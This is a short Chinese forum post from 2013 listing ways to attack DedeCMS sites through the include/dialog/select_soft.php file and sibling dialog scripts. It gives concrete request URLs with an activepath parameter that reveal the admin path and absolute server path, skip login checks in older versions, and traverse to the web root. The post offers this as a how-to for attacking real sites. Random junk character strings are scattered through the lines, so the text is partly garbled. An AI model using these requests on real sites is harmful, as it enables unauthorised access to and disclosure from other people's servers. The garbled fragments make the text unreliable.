1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理! t8 ]/ q; ^3 H
+ {: N' W9 y! g- p( ^+ o
员帐号,新版本的就直接转向了后台.
6 ]( }- F% X* ? z6 g4 R! E+ \* Q1 |/ b7 I' X5 U
2.include/dialog/config.php会爆出后台管理路径( i$ v: J; i4 ?- m4 N
* y; k" W) X" t3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录8 }! R6 {' f/ Y. w: x
% w' G/ T4 g* }& M4 @. e4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.7 q2 n) f) [1 i, L/ b( x
) A( P" p" ]3 [, s
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
6 c8 y, T; G1 H( X1 g$ j. T, P& I( ~: w- M, x( N6 F
到根目录去.不过这些版本的访问地址有些不同.
7 \& H: c- Y# ?9 M地址为require/dialog/select_soft.php?activepath=/././././././././3 z; |: e3 F3 y" r
7 |8 I, r6 G' v2 Zinclude\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..# t3 s: j' j B' O. [# P
存在相同问题的文件还有
/ V9 p' T/ k" U' r. j1 B/ W' O% N, [include\dialog\select_images.php. D# l t" a S3 i; E/ ?
include\dialog\select_media.php
f3 _) F( F+ V% _/ T; L& A9 binclude\dialog\select_templets.php& m" ]8 ^ \) t4 Y' G
|
发表于 2013-4-16 16:50:43
收藏
支持
反对